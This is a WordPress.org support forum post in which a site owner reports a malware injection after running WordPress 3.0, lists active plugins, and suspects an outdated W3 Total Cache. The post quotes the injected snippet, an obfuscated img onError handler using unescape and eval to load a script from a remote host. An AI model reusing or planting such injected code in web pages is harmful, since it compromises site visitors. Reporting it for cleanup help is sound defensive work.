WordPress.org

Support

Support » Plugins and Hacks » Malware – Code Malicious on WordPress

Malware – Code Malicious on WordPress

  • Yesterday my website has been attacked at code Malware:

    <img src="about:blank" onError='astro=unescape("%27");astru=
    unescape("%22");sksa=eval("document.getElementById("+astro+"
    seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"
    +astro+")+document.getElementById("+astro+"niinnii"+astro+")
    .id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"gb"+as
    tro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.ge
    tElementById("seaid").src=sksa' style="width:300;height:300;
    border:0px;">

    The version of wordpress that I was using is: 3.0 and the plugin activate are:

    Akismet
    Author Advertising
    Featured Content Gallery
    Google XML Sitemaps
    IntenseDebate
    My Category Order
    Permalink Redirect
    Platinum SEO Pack
    Sociable
    W3 Total Cache
    Wordpress Related Post
    WP-PostViews
    WP No Category Base

    I think that because this problem is the plugin W3 Total Cache, in fact the version I used was not updated yet. Now i have update to last versione W3 Total Cache and WordPress to last version 3.0.1.
    At the moment it seems that this code is no longer infected, but my hoster warned me that even after updating the plugin there were some infected files still.

    Does anyone have this type of attack?
    the malicious code is present in the end pages wordpress.

    Now i have deactivate the plugin w3 total cache.
    Thank You.

Viewing 9 replies - 1 through 9 (of 9 total)
Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘Malware – Code Malicious on WordPress’ is closed to new replies.